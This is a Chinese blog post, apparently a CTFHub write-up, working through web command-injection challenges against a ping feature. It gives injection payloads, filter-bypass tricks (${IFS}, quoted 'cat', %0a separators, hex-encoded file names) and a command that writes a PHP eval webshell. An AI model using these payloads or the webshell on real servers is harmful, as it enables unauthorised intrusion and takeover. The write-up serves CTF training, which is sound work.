CTFHUB-web-RCEwp总结

最新推荐文章于 2024-03-30 22:09:54 发布
最新推荐文章于 2024-03-30 22:09:54 发布
阅读量794 收藏 2
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43669045/article/details/105470378
版权

RCE

RCE英文全称:remote command/code execute
分为远程命令执行ping 和 远程代码执行evel。
区别:远程代码执行是调用服务器网站代码进行执行,命令注入是调用操作系统命令进行执行。基于这个区别,攻击利用方式有所不同。
在这里插入图片描述

文章目录

命令注入

提示:这是一个在线测试网络延迟的平台,路由器中经常会见到。无任何安全措施,尝试获取 flag

访问网站,随意输入一些内容 可以看出是一个测试网络延迟的功能
在这里插入图片描述
网站有提供源码 get获取ip 直接拼接语句执行操作
exec()函数用来执行一个外部程序
在这里插入图片描述

利用系列命令获取当前路径下的文件信息,获得特殊内容,尝试利用cat查看文件信息内容,但无内容输出,再后面加个管道命令以base64编码后的内容输出,解码后获得flag

1 & ls 
1 & cat "18502316747991.php"
1 & cat "18502316747991.php"|base64

在这里插入图片描述

在这里插入图片描述

PS:也可以尝试执行命令写入带有一句话的文件,使用工具连接

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php

过滤cat

访问,提示过滤cat 但可以用其他的文件内容查看的命令替换 例:tac more less等

cat:由第一行开始显示文件内容
tac:从最后一行开始一行行反向打印(是cat的反写
more:一页页地显示文件内容
less:区别于more,添加往前翻页功能
head:取文件前面几行
tail:取文件后面几行
od:以特定编码格式输出

在这里插入图片描述
利用ls 命令获得文件名 再查看文件获取flag

1& tac "flag_31617147328526.php"|base64

在这里插入图片描述
在这里插入图片描述

过滤空格

访问 提示过滤空格但可以用其他内容来替换过滤

过滤空格绕过:
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

<      cat<xxx.php
${IFS} cat${IFS}xxx.php
$IFS$9 cag$$IFS$9xx.php

在这里插入图片描述

利用ls 命令获得文件名 再查看文件获取flag

1&cat<"flag_2944813079198.php"|base64

在这里插入图片描述

过滤目录分隔符

要点:灵活的运用各种操作组合达到目的

命令分隔符
linux中:%0a 、%0d 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)

; 命令按照顺序(从左到右)被执行,用分号进行分隔。	当有一条命令执行失败时,不会中断其它命令的执行。
& 简单拼接 无限制
&& 前面执行成功后面才会执行
|  管道命令左边输出 作为右边输入,
|| 前面执行失败才会执行后面

访问 过滤了目录分隔符 /
在这里插入图片描述
查看当前路径下文件 发现flag在文件夹中,因为目录分隔符被过滤无法直接使用/ ,换思路
在这里插入图片描述
尝试先进入目标文件夹,再查看当前文件夹内容,可以发现 那么就再用cat 查看文件内容

1 & cd flag_is_herer; ls;cat xxxx.php

在这里插入图片描述

过滤运算符

访问 提示过滤运算符,查看代码 过滤了 ||,| ,& 但不影响我们使用其他的运算符

; 命令按照顺序(从左到右)被执行,用分号进行分隔。	当有一条命令执行失败时,不会中断其它命令的执行。
& 简单拼接 无限制
&& 前面执行成功后面才会执行
|  管道命令左边输出 作为右边输入,
|| 前面执行失败才会执行后面

在这里插入图片描述

使用分号 命令分隔符 查看文件信息 获得目录flag文件 使用cat查看(注意这里因为|被过滤 无法使用base64加密查看 但其实在源码中可以直接获得flag)

1 ;ls 
1;ls ;cat xxx.php
查看网页源码获得flag

在这里插入图片描述
在这里插入图片描述

综合过滤练习

访问 这是对之前所有的内容进行综合过滤了

过滤内容:\,||,|,/,&, ; ,"空格", cat,flag,ctfhub,

在这里插入图片描述

绕过思路

命令分隔符 & || | ;绕过->  %OA  (换行符)  
空格 			  绕过->  ${IFS}
特殊命令cat         绕过-> ca''t 
特殊文件名 			绕过-> $(printf "16进制文件名")

(1)查看当前路径文件

 ?ip=1%0als#
 ?ip=1;ls#

在这里插入图片描述
(2)查看flag_is_here文件下的内容

?ip=1%0Als${IFS}$(printf${IFS}"\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65")#

?ip=1;ls flag_is_here#

在这里插入图片描述
(3)查看xxx.php文件内容,获得flag

?ip=1%0Aca%27%27t${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65\x2F\x66\x6C\x61\x67\x5F\x31\x33\x38\x37\x38\x34\x32\x38\x38\x31\x38\x36\x36\x33\x2E\x70\x68\x70%22)#

?ip=1;cat flag_is_here/flag_13878428818663.php#

在这里插入图片描述
Ps:注意编码问题,url可能会自动转义

Alexhirchi
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CtfHub-wp(web)
01-23
ctfhub平台web篇wp
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
[CTFHub]备份文件下载系列题目(总结)(web>信息泄露)
ZXW_NUDT的博客
05-02 372
在技能树中,“备份文件下载这一章有四个节点” 对于不确定文件的扫描都可以使用dirsearch命令 这是一个在KALI Linux系统里完成的 以下是本人解体思路的链接:↓ 网站源码 bak文件 vim缓存 .DS_Store 比如:网页源码↓ ...
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 777
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
ctfhub技能树web:RCE里的eval执行和命令注入
最新发布
2302_81010533的博客
03-30 336
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
【CTFHUB技能树】-命令注入RCE综合练习
zguohuai的博客
03-15 620
在CTFHUB攻防世界解决命令行综合注入
CTFHUB-RCE-eval执行
u014794539的博客
07-11 255
考点 一句话木马 eval执行 思路分析 打开直接 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 那就直接连蚁剑了。。。。 直接找到了 得到flag ctfhub{587c0757ccda0ba89da63da0} ...
【CTFHub】 RCE - eval执行
cx_sam的博客
08-07 917
CTFHub RCE eval执行
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 1947
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHub-Web-HTTP协议
qq_54037445的博客
11-21 1536
CTFHub-Web-Web前置技能-HTTP协议 请求方式、302重定向、cookie、基础认证
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
CTF-web学习大纲
01-30
CTF-web学习大纲
CTFHUB RCE-----eval执行
winofkill的博客
12-11 1669
首先进入题目 我们先了解一下php当中eval()函数的作用 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。 比如说eval($_REQUEST["cmd"]) $_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据 进入题目 cmd是其中的参数,我们就把命令赋给cmd,我们先显示一下网页的根目录 ?cmd=system("ls "); 接着我们看上一级目录 ?cmd=system("ls /")..
Buuctf -web wp汇总(一)
Alexhirchi的博客
05-07 5482
BuuCTF平台 [极客大挑战 2019]EasySQL1 访问,一个登陆界面 尝试随意登录,提示账号和密码错误 构造点在url,账号密码再url中,尝试构造恶意SQL语句,发现是最基本的报错型注入,无过滤。典型的’ # 闭合,先判断出3列,再用联合查询 'select 1,2,3 %23 直接获得了flag。利用万能密码也可以获得flag [极客大挑战 2019]LoveSQL1 访问,是一个登...
CTFHUB-web-信息泄露wp总结
Alexhirchi的博客
03-29 2204
目录遍历 访问,进入发现都是目录,对各个文件访问 发现在 /1/1 目录下发现flag.txt 打开获得flag 我们利用脚本去遍历一遍文件 在这里插入代码片 这里我们做题不仅仅是为了获得flag,更重要的系统的掌握知识体系 考点:目录遍历漏洞(由于配置错误导致网站的目录可被遍历,一般该类漏洞可以为后续利用提供一些信息上的帮助) 存在问题: (1)操作系统没有限制对文件的访问权限。导致任何人...
Buuctf -web wp汇总(二)
Alexhirchi的博客
06-27 2079
文章目录[ASIS 2019]Unicorn shop[网鼎杯 2020 青龙组]AreUSerialz [ASIS 2019]Unicorn shop 要点:Unicode安全设计 题目要求,当我们买下商品4,获得flag(买其他商品会提示,商品错误),但它只允许输入一个字符,而商品4要求价格为1337.0 。这里利用的就是Unicode的设计漏洞问题,该网站是UTF-8编码。给一个Unicode>1337的值就可以获得flag,可以通过网站获取一些特殊字符ↂ(查询thousand关键字) 参考链
Buuctf -web wp汇总(三)
Alexhirchi的博客
07-15 2041
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录[WUSTCTF2020]朴实无华[WUSTCTF2020]颜值成绩查询[GKCTF2020]EZ三剑客-EzWeb[CISCN2019 华北赛区 Day1 Web5]CyberPunk[V&N2020 公开赛]TimeTravel[NCTF2019]True XML cookbook [WUSTCTF2020]朴实无华 要点:逻辑漏洞 函数绕过 进入.
CTFHUB-web-文件上传wp总结
Alexhirchi的博客
04-12 2032
CTFHUB文件上传总结 文件上传漏洞是指攻击者上传了一个可执行的脚本文件到服务器,并执通过此脚本文件获得执行服务端命令的能力。这里上传的文件可以是木马,病毒,恶意脚本,钓鱼图片或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传功能本身是一个正常业务需求,而问题就在于,服务器如何处理解释这个文件,当处理逻辑不够安全,...
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值